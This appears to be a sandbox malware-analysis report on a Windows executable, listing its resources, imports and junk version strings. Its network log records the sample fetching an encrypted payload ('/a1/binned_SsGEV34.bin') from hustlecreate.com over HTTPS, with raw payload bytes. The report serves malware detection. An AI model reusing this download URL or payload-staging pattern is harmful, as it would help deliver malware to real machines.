                                                                          RT_ICON0x7de780x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 254, next used block 2130706432EnglishUnited States
                                                                          RT_ICON0x820a00x35e0PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                          RT_ICON0x856800x25a8dataEnglishUnited States
                                                                          RT_ICON0x87c280x10a8dataEnglishUnited States
                                                                          RT_ICON0x88cd00xea8dataEnglishUnited States
                                                                          RT_ICON0x89b780x988dataEnglishUnited States
                                                                          RT_ICON0x8a5000x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0EnglishUnited States
                                                                          RT_ICON0x8ada80x6c8dataEnglishUnited States
                                                                          RT_ICON0x8b4700x668dataEnglishUnited States
                                                                          RT_ICON0x8bad80x568GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                          RT_ICON0x8c0400x468GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                          RT_ICON0x8c4a80x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 4294965391, next used block 7403512EnglishUnited States
                                                                          RT_ICON0x8c7900x1e8dataEnglishUnited States
                                                                          RT_ICON0x8c9780x128GLS_BINARY_LSB_FIRSTEnglishUnited States
                                                                          RT_DIALOG0x8caa00x100dataEnglishUnited States
                                                                          RT_DIALOG0x8cba00x11cdataEnglishUnited States
                                                                          RT_DIALOG0x8ccc00xc4dataEnglishUnited States
                                                                          RT_DIALOG0x8cd880x60dataEnglishUnited States
                                                                          RT_GROUP_ICON0x8cde80x102dataEnglishUnited States
                                                                          RT_VERSION0x8cef00x298dataEnglishUnited States
                                                                          RT_MANIFEST0x8d1880x33eXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                                                          Imports

                                                                          DLLImport
                                                                          ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
                                                                          SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
                                                                          ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
                                                                          COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                                                          USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
                                                                          GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                                                          KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

                                                                          Version Infos

                                                                          DescriptionData
                                                                          LegalCopyrightSELVFORKL
                                                                          FileVersion14.32.29
                                                                          CompanyNamexanthopicr
                                                                          LegalTrademarksUDSLUTTETGABSTE
                                                                          CommentsSvolvdioxidemiss200
                                                                          ProductNamefrstedirektrenta
                                                                          FileDescriptionSKESSONGLANDSKUM
                                                                          Translation0x0409 0x04b0

                                                                          Possible Origin

                                                                          Language of compilation systemCountry where language is spokenMap
                                                                          EnglishUnited States

                                                                          Network Behavior

                                                                          Network Port Distribution

                                                                          TCP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          May 27, 2022 09:53:19.946286917 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:19.946378946 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:19.946561098 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:19.982089996 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:19.982120991 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.253333092 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.253576040 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.396195889 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.396209002 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.396482944 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.396707058 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.400588036 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.442625046 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.530900002 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.530997038 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.531191111 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.531251907 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.531269073 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.531279087 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.531413078 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.659735918 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.660029888 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.660077095 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.660188913 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.660454988 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.660496950 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.660696983 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.660924911 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.660969019 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.789388895 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.789664984 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.789704084 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.789999962 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.790205956 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.790232897 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.790244102 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.790455103 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.790759087 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.790977955 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.791210890 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.791244984 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.791256905 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.791460037 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.791706085 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.791742086 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.791953087 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.792181969 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.792217016 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.792226076 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.792455912 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.792685986 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.792721033 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.792728901 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.921500921 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.921737909 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.921788931 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.921799898 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.921813965 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.922292948 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.922488928 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.922552109 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.922564983 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.922574043 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.923063040 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.923263073 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.923309088 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.923320055 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.923329115 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.923579931 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.923824072 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.923867941 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.924247026 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.924464941 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.924511909 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.924523115 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.924535990 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.924890041 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.925085068 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.925127983 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.925137997 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.925146103 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.925266027 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.925477982 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.925683022 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.925695896 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.925698996 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.925700903 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.925704002 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.925707102 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.925802946 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.925955057 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.925970078 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.925975084 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.925980091 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.925987959 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.925992966 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.926001072 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.926012039 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.926178932 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.926202059 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.926223040 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.926235914 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.926350117 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.926361084 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.926372051 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.926378965 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.926388979 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.926426888 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.926430941 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.926438093 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.926525116 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.926536083 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.926623106 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.926635027 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.926650047 CEST4434976469.49.244.14192.168.11.20
                                                                          May 27, 2022 09:53:20.926671982 CEST49764443192.168.11.2069.49.244.14
                                                                          May 27, 2022 09:53:20.926815033 CEST49764443192.168.11.2069.49.244.14

                                                                          UDP Packets

                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          May 27, 2022 09:53:19.752115011 CEST5034953192.168.11.201.1.1.1
                                                                          May 27, 2022 09:53:19.932111025 CEST53503491.1.1.1192.168.11.20

                                                                          DNS Queries

                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                          May 27, 2022 09:53:19.752115011 CEST192.168.11.201.1.1.10xad3cStandard query (0)hustlecreate.comA (IP address)IN (0x0001)

                                                                          DNS Answers

                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                          May 27, 2022 09:53:19.932111025 CEST1.1.1.1192.168.11.200xad3cNo error (0)hustlecreate.com69.49.244.14A (IP address)IN (0x0001)

                                                                          HTTP Request Dependency Graph

                                                                          • hustlecreate.com

                                                                          HTTPS Proxied Packets

                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          0192.168.11.204976469.49.244.14443C:\Users\user\Desktop\SecuriteInfo.com.W32.AIDetect.malware2.5627.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          2022-05-27 07:53:20 UTC0OUTGET /a1/binned_SsGEV34.bin HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                          Host: hustlecreate.com
                                                                          Cache-Control: no-cache
                                                                          2022-05-27 07:53:20 UTC0INHTTP/1.1 200 OK
                                                                          Date: Fri, 27 May 2022 07:53:20 GMT
                                                                          Server: Apache
                                                                          Last-Modified: Thu, 26 May 2022 20:46:49 GMT
                                                                          Accept-Ranges: bytes
                                                                          Content-Length: 175680
                                                                          Connection: close
                                                                          Content-Type: application/octet-stream
                                                                          2022-05-27 07:53:20 UTC0INData Raw: 18 d9 72 96 84 a7 15 fb a7 b7 54 c7 eb 7a f0 1d 49 1b 88 5f db 0f 7d 0e bb 35 52 6b e7 2e 91 06 c8 6b f0 2c b7 c3 52 a7 10 ba a9 b8 f8 12 fe 84 ed b9 60 ac 7f 30 12 a6 d4 9b 20 c5 2a ad 85 e8 81 38 c5 85 9a 2f ee 01 38 d7 7d c8 53 62 22 14 ba 4d 6b af 72 15 27 a9 0f f0 86 04 bb c6 51 1d 7b 47 9b d8 0d de c3 58 07 70 71 c0 72 c6 f3 82 77 bf 4a f1 08 bd 15 3d 4b 7f 94 be 8e e7 86 a0 a4 f8 5d 04 dd e3 a2 18 a4 a8 cc cd 42 7d e8 45 4c af ed fd 1d 71 1c 0b b7 30 a0 41 2d a3 10 ff ba 47 ea f3 42 c6 c2 25 3a 6b fa c0 33 e4 ae 86 4a 9b 4f 70 34 0a a0 1e 6a e8 cd 8b 9e cf 20 e3 5c 8f ef df 75 bb 04 92 17 4e 02 da ca cb db 3a 24 62 fb 15 56 44 6e 8b 7d 66 38 30 de a4 c9 4d e1 d3 ed de 69 f0 43 32 33 97 61 9e 7f 36 f4 87 1e 05 55 cd 03 e4 6c 2c 9d 98 55 fd 84 0c e9
                                                                          Data Ascii: rTzI_}5Rk.k,R`0 *8/8}Sb"Mkr'Q{GXpqrwJ=K]B}ELq0A-GB%:k3JOp4j \uN:$bVDn}f80MiC23a6Ul,U
                                                                          2022-05-27 07:53:20 UTC8INData Raw: 95 c2 cf 88 90 b4 50 9a 40 ce 24 a2 88 7f af 42 c7 12 c0 29 f5 1c 01 22 a8 a2 53 b9 2d 11 e7 4f e4 3f 04 97 2a e3 d7 c1 45 dd 81 14 b2 45 24 32 73 a7 9e a5 5a 04 ea 9e b0 9a 7f bc 1a 80 1a 86 7d 96 29 5d a2 52 e2 c2 8b 19 fd ff fc a9 e7 60 75 df ab 39 53 50 a1 24 a1 65 69 52 32 ac 52 5b 66 b0 6a 2b 21 b0 17 dd d1 fe 29 50 58 57 db ad a8 b1 af c2 e8 fc 82 f3 56 7d 4f d3 6f f6 8f 9a 4f 1f bd c9 26 e4 e0 dc c3 b9 d9 1c 43 cc d6 3b e6 a7 7e 32 7c f5 23 62 da ba a5 9d 9c 6d 8b 12 33 fa fc 12 5b aa 52 49 43 27 89 68 de 3a ab e9 cd b3 af 7c e2 fb 1d 23 c3 bf 3e 62 73 fb d3 0a 19 4b 24 8e 5b 25 3a 9d 5f 17 80 99 10 91 a8 93 65 e7 23 e7 87 3f a2 65 6f dd 47 e8 5d 0c 56 94 ae 35 e7 81 59 a8 96 d7 ab a3 32 c2 59 ee 8b 29 6b 47 f4 3a 04 b7 46 47 3b 83 11 5a a3 9d 92
                                                                          Data Ascii: P@$B)"S-O?*EE$2sZ})]R`u9SP$eiR2R[fj+!)PXWV}OoO&C;~2|#bm3[RIC'h:|#>bsK$[%:_e#?eoG]V5Y2Y)kG:FG;Z
                                                                          2022-05-27 07:53:20 UTC15INData Raw: 7b 63 8d 07 9a 0c 6c 53 64 57 5f 49 48 29 cb 99 07 12 fb ce e7 d0 8d a8 f6 da 78 99 9e 98 1c 21 1a ff f1 3b 1d ca 78 fa 17 89 bc ce c0 93 e4 b5 5b 0c ad c9 09 4d 5e c0 ce 41 03 f2 a9 85 85 95 21 8d 74 9e 48 92 47 d1 50 d9 40 f9 19 ac 45 45 31 9a ac 26 4e f2 56 a9 31 df 91 7d 13 03 f2 c8 42 08 e4 d2 f3 47 13 dc 51 1f 3c 9d a9 14 0e cd 07 9e 95 4e de 58 e8 e9 93 e1 d0 6f 73 74 63 be 4e 55 16 9a f6 09 35 3c 04 44 d8 24 c3 f4 a2 a3 e6 58 f3 1c c7 b3 70 6d d4 dc b6 9a 59 81 d0 cf 8f f4 67 ea 62 3f af 07 c6 dd 32 e7 0c 2c 65 04 7d fa 7c 69 1b 63 84 0e 90 8c 87 b2 c9 67 55 44 18 65 46 1c 71 f7 55 7f 10 d9 ad 95 a6 f8 e9 2f b6 e8 26 74 95 74 a5 83 2a 08 ca fd e5 d9 da 24 94 22 ae bf 0f 47 8b a5 a3 e1 95 b7 cc 89 0b 68 c3 4a 92 d4 d6 07 37 17 da f8 64 a2 c0 89 ed
                                                                          Data Ascii: {clSdW_IH)x!;x[M^A!tHGP@EE1&NV1}BGQ<NXostcNU5<D$XpmYgb?2,e}|icgUDeFqU/&tt*$"GhJ7d
                                                                          2022-05-27 07:53:20 UTC23INData Raw: 9a 25 8c 00 38 04 8b 2c d7 57 da 1d 7a 71 b7 47 1a b0 a5 69 24 33 de 76 cf ae ac e2 84 10 c9 30 66 bf c2 58 8a f5 89 3d 8d 39 a3 6a 38 db 4b f1 b1 e1 15 3d 4b f2 2a 4e ba e7 86 f7 cc 6e 6b 4f 25 aa 54 2a 6d 26 a9 80 8f df 78 09 26 1c 9d 00 fa e6 86 86 29 0a d2 ca 6f a9 7f 90 43 e3 cd 6e 9f 4b 48 c8 de 06 c4 08 54 ca fc a6 ac 67 0b 18 1a 07 2e d0 42 82 cd 06 13 37 dd 1c be a8 b8 2b 46 ac a8 fd cf 9f 34 25 93 dc 4b 1c 8e 76 6e 60 41 d0 6c ee c8 34 7b 85 db 44 d7 66 f8 d2 53 f6 f2 44 df 57 66 39 c9 93 75 64 5f 83 be 54 fa 98 88 08 ed c0 d1 d9 55 fd 9e 86 9d ce b1 a6 e6 a0 3c 30 77 03 0e 61 e5 84 4b 18 df c9 a0 08 24 a1 de 08 28 b4 e1 fe dd f3 54 03 24 ea 94 a3 be 9f 34 03 94 29 66 ae 60 00 23 7e eb bc 37 35 c7 b4 22 51 e5 8d f6 f8 90 be 89 3c e3 48 7e e5 f2
                                                                          Data Ascii: %8,WzqGi$3v0fX=9j8K=K*NnkO%T*m&x&)oCnKHTg.B7+F4%Kvn`Al4{DfSDWf9ud_TU<0waK$(T$4)f`#~75"Q<H~
                                                                          2022-05-27 07:53:20 UTC31INData Raw: ad b9 18 61 67 e8 f1 12 d7 62 2d 40 bb f9 6e f6 03 a2 e0 d5 8b c1 7c 3b 61 8c 81 92 ca 88 f0 d1 b4 19 1e 09 13 0b 76 3a b8 32 32 a2 91 1a 2c 9f b9 ed f9 12 2c cd a0 96 64 64 0d 09 53 1b 52 eb a6 cf 33 ca e9 d1 b2 9f a4 ac 48 4c 04 23 6e 39 ab 31 53 0a cb 82 29 a8 33 70 32 08 aa bd 3f b1 0a 41 c5 09 51 e0 3f 4d 40 86 fa d4 f7 9a 0f fa 92 94 41 e9 b1 f8 ee 80 3b 9a 79 d4 63 2b 58 ff d3 ba 2c 77 27 d7 21 04 c2 33 da 13 9f 33 e7 80 20 cb f3 4c 17 0c 56 da 4c 8e 96 4d 6d d6 f5 07 1c af 25 3c 5e 66 b9 43 b7 fa 6b 52 05 59 6c e8 a3 c9 46 62 6b 19 40 72 19 c3 e0 2d aa 71 d0 7d 60 41 d9 65 f3 c2 d3 7d ab cf 1b a0 86 01 16 27 bf 76 2a 4c 7e ff 6f d3 eb 94 67 33 e6 8d 35 86 b5 f0 68 78 e9 14 05 e8 fd 6a b2 c1 fa 7d 2f 77 9b f2 31 0b bb dd b2 4b 0c 32 29 72 93 79 9a
                                                                          Data Ascii: agb-@n|;av:22,,ddSR3HL#n91S)3p2?AQ?M@A;yc+X,w'!33 LVLMm%<^fCkRYlFbk@r-q}`Ae}'v*L~og35hxj}/w1K2)ry
                                                                          2022-05-27 07:53:20 UTC39INData Raw: 97 28 84 97 88 92 27 69 4f 0b 0b 89 0b d4 fb 31 0e 9e 18 a8 2e 88 12 1b ca 6e f7 27 03 e6 60 79 b0 b6 43 35 74 14 57 70 24 80 b0 16 60 62 14 80 24 09 85 10 0d 94 9c fa 8a ed 96 fa 88 8e 62 71 78 ca 89 c5 46 01 df 75 63 58 ef da d3 4a d0 fb af 4f 03 43 4b 5c cc c7 f2 d6 fe 4b 1f bd 78 c5 81 c7 4f ae 39 3c 7d c2 79 37 4f 2f 3a 7d 44 62 dd 69 62 6e b6 62 98 e5 08 28 27 ca e9 53 67 a2 97 e3 06 cb e1 26 0b 85 a0 64 c7 e6 2c 2f 80 5c f0 1b c0 72 d4 5a 3b e0 ee 8f 4a 7d 34 0a 15 be 91 db 8a 1f 27 85 04 d6 60 44 85 32 48 5c bf 59 71 db c8 4a 6a a4 7e 8a e9 d5 ba 33 14 73 5c 07 27 c5 c0 b5 f7 01 ad 1d ea 73 14 98 72 e3 6d b0 2c a6 e4 23 b3 07 be 56 d5 ae 19 05 39 16 8f f6 1f 29 5a 45 fb b3 37 aa 4b cf 05 24 32 03 f1 07 0b 0c 32 fd e3 89 be c9 18 79 af 1c a6 e6 05
                                                                          Data Ascii: ('iO1.n'`yC5tWp$`b$bqxFucXJOCK\KxO9<}y7O/:}Dbibnb('Sg&d,/\rZ;J}4'`D2H\YqJj~3s\'srm,#V9)ZE7K$22y
                                                                          2022-05-27 07:53:20 UTC47INData Raw: 4a 1a 81 50 f4 21 20 88 b2 71 1c 9b 13 1b 07 ae d4 1e 63 88 87 15 c7 76 89 40 93 47 74 79 54 90 6c 1b 51 95 fd 7b e9 f8 4f 66 db 5f e3 85 73 2d 3e 30 75 a1 1b 0f 72 84 dd fe 9a 86 f9 cc 5f d0 cc 8d 7f ee fa 20 21 32 a1 48 52 66 16 6b 1a 6d 2c cd 50 d8 0b 31 f2 17 f5 f2 4b ab 24 61 c4 11 dd 84 11 12 78 b4 f0 b8 74 81 05 4c 5f dd 07 ac 38 67 08 26 8f 15 28 fb b9 c4 c5 38 8e 34 fa 6b d6 0d d9 47 0c 23 f5 a6 a3 38 af c9 3f 57 da 33 bc f9 fa 90 ef b5 78 b0 0f 84 68 ec 2a 0e b7 60 32 b1 3f 79 8a b0 2b 9f 35 04 65 1d 2d 21 54 c7 42 1d 08 75 99 63 f1 84 48 93 8d 66 45 d9 ad ae ca 41 65 77 b4 2a c7 47 9d d2 bf de d2 ba 0c fc d6 35 2f 77 6d d2 e6 c4 0b 0e 92 a0 0b 5e cd b2 19 6e 32 a9 57 13 ba bd 33 32 29 c4 53 0f 9f 68 06 88 ac 63 da 44 3d e0 98 7d b3 68 c6 80 06
                                                                          Data Ascii: JP! qcv@GtyTlQ{Of_s->0ur_ !2HRfkm,P1K$axtL_8g&(84kG#8?W3xh*`2?y+5e-!TBucHfEAew*G5/wm^n2W32)ShcD=}h
                                                                          2022-05-27 07:53:20 UTC55INData Raw: 76 f4 56 05 5b 64 99 1f 71 a7 62 0a a9 1b 78 c0 55 7c 76 30 7d 92 32 a3 cf e2 9d 72 81 53 61 c5 e9 cd 54 5c 9b a1 4f b8 3d fb 1b 29 be 3a 69 60 ab 52 14 ce 54 a4 5c e9 f2 ba d8 a4 d3 64 90 d5 ea 91 31 51 24 7e 88 19 11 3d 8e f5 3a 93 40 4b cf 7c df c3 8a d5 88 e2 b6 cc e8 1b 73 9a 89 26 ef 44 c0 c3 f1 fe 27 19 c5 ac 9c ea d8 cd ab 09 f5 69 53 3e 27 7e bf dc 20 6a df 8a 8a 3a b4 98 ba 6c af fb d0 47 ce ec e0 a7 e4 f1 da f8 72 31 0b 38 f1 42 28 cc 46 83 75 93 a7 e4 5a 73 f7 d9 88 cf 9c c6 3e 7d 64 7a dd a0 c8 5b 63 47 73 d9 1d 2b c4 e4 9a b5 96 3c 42 b8 61 c6 79 23 6e 8f a4 47 13 cc 5f 64 69 33 b6 b4 36 c2 56 5a c3 b1 9b a4 62 2a 4d 41 58 f8 2b 37 1b 6f 3c 2c 53 d9 9c 87 98 8c e9 e8 cf e7 83 fd 29 6d c6 5b 76 33 1d 6f 07 a5 c3 33 3d cf da a3 b6 4b 0a a9 b1
                                                                          Data Ascii: vV[dqbxU|v0}2rSaT\O=):i`RT\d1Q$~=:@K|s&D'iS>'~ j:lGr18B(FuZs>}dz[cGs+<Bay#nG_di36VZb*MAX+7o<,S)m[v3o3=K
